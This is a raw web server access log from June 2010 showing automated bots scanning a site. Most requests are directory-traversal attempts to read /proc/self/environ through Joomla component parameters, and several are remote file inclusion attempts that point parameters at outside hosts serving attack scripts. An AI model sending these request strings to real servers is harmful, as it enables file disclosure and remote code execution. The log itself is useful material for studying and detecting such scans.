110.45.144.106 - - [27/Jun/2010:20:53:19 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:53:51 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:53:52 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:53:59 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:54:02 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
78.110.50.134 - - [27/Jun/2010:20:54:26 -0500] "GET /logs/access_log.1276732800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
110.45.144.106 - - [27/Jun/2010:20:55:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:55:56 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:55:59 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:56:22 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:56:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.7.108.242 - - [27/Jun/2010:20:56:26 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:56:26 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:56:27 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
110.45.144.106 - - [27/Jun/2010:20:56:28 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:56:34 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
78.110.50.134 - - [27/Jun/2010:20:57:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:57:08 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:57:08 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
195.20.196.20 - - [27/Jun/2010:20:57:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:23 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:57:23 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:57:55 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:57:56 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:57:56 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
110.45.144.106 - - [27/Jun/2010:20:58:07 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:58:20 -0500] "GET /logs/access_log.1277164800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
195.20.196.20 - - [27/Jun/2010:20:59:00 -0500] "GET /logs/access_log.1274832000%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:59:00 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:59:00 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:20:59:56 -0500] "GET /logs/access_log.1277164800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
87.118.96.160 - - [27/Jun/2010:21:01:03 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:01:55 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:02:45 -0500] "GET /logs/access_log.1276732800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
110.45.144.106 - - [27/Jun/2010:21:02:48 -0500] "GET /logs/access_log.1276214400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:02:53 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:02:56 -0500] "GET /logs/access_log.1276214400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:02:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.58.170.148 - - [27/Jun/2010:21:02:58 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:02:58 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11233 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:02:59 -0500] "GET /logs/access_log.1277164800/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:02:59 -0500] "GET /logs/access_log.1274572800/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
110.45.144.106 - - [27/Jun/2010:21:02:59 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:03:01 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:03:03 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:03:07 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:03:09 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:04:47 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:04:48 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
208.115.111.248 - - [27/Jun/2010:21:04:52 -0500] "GET /logs/access_log.1212883200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:04:54 -0500] "GET /logs/access_log.1213056000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
83.103.72.131 - - [27/Jun/2010:21:04:55 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
208.115.111.248 - - [27/Jun/2010:21:04:57 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:04:59 -0500] "GET /logs/access_log.1213228800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:05:02 -0500] "GET /logs/access_log.1213315200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:05:05 -0500] "GET /logs/access_log.1213401600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:05:07 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:05:10 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:05:13 -0500] "GET /logs/access_log.1213833600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Jun/2010:21:05:15 -0500] "GET /logs/access_log.1213920000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
195.20.196.20 - - [27/Jun/2010:21:05:59 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:05:59 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:05:59 -0500] "GET /logs/access_log.1274832000%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:06:31 -0500] "GET /logs/access_log.1277164800%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 323 "-""Casper Bot Search"
110.45.144.106 - - [27/Jun/2010:21:06:32 -0500] "GET /logs/access_log.1277164800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:06:32 -0500] "GET /logs/access_log.1277164800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.46.199.252 - - [27/Jun/2010:21:07:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.252 - - [27/Jun/2010:21:07:08 -0500] "GET /artwork/hennco5.JPG HTTP/1.1" 200 7674 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
83.103.72.131 - - [27/Jun/2010:21:07:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:25 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:25 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:25 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:25 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:26 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.58.170.148 - - [27/Jun/2010:21:07:37 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:07:37 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:07:37 -0500] "GET /logs/access_log.1274572800/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
83.103.72.131 - - [27/Jun/2010:21:07:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:39 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:07:39 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:08:16 -0500] "GET /logs/access_log.1275091200/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
65.55.51.112 - - [27/Jun/2010:21:08:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.58.170.148 - - [27/Jun/2010:21:09:51 -0500] "GET /logs/access_log.1274832000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
110.45.144.106 - - [27/Jun/2010:21:10:44 -0500] "GET /logs/access_log.1275091200/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:10:50 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:10:56 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:21:11:02 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.58.170.148 - - [27/Jun/2010:21:11:28 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:11:28 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:11:29 -0500] "GET /logs/access_log.1274572800/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
109.203.102.146 - - [27/Jun/2010:21:11:41 -0500] "GET /?option=com_awiki&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
109.203.102.146 - - [27/Jun/2010:21:11:42 -0500] "GET /logs/?option=com_awiki&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11233 "-""oi"
109.203.102.146 - - [27/Jun/2010:21:11:42 -0500] "GET /logs/access_log.1277164800/?option=com_awiki&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:12:57 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:12:57 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:12:57 -0500] "GET /logs/access_log.1274572800/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:14:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
207.58.170.148 - - [27/Jun/2010:21:15:03 -0500] "GET /logs/access_log.1274832000/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
62.44.82.118 - - [27/Jun/2010:21:16:41 -0500] "GET /*/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
87.229.45.142 - - [27/Jun/2010:21:16:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:44 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:44 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.45.142 - - [27/Jun/2010:21:16:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
207.7.108.242 - - [27/Jun/2010:21:18:12 -0500] "GET /logs/access_log.1274572800/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:18:13 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:21:18:13 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
195.20.196.20 - - [27/Jun/2010:21:18:54 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:18:54 -0500] "GET /logs/access_log.1275609600/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
195.20.196.20 - - [27/Jun/2010:21:18:54 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
68.168.223.135 - - [27/Jun/2010:21:19:14 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
68.168.223.135 - - [27/Jun/2010:21:19:14 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
68.168.223.135 - - [27/Jun/2010:21:19:14 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
68.168.223.135 - - [27/Jun/2010:21:19:16 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
68.168.223.135 - - [27/Jun/2010:21:19:16 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
68.168.223.135 - - [27/Jun/2010:21:19:16 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.103.72.131 - - [27/Jun/2010:21:19:21 -0500] "GET /logs/access_log.1277164800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:25 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:25 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:25 -0500] "GET /logs/access_log.1277164800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:25 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:26 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
91.198.130.7 - - [27/Jun/2010:21:19:33 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:19:33 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:21:19:33 -0500] "GET /logs/access_log.1274054400/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
83.103.72.131 - - [27/Jun/2010:21:19:41 -0500] "GET /logs/access_log.1277164800/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:41 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.103.72.131 - - [27/Jun/2010:21:19:41 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.118.96.160 - - [27/Jun/2010:21:19:48 -0500] "GET /logs/access_log.1274572800/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:21:19:48 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
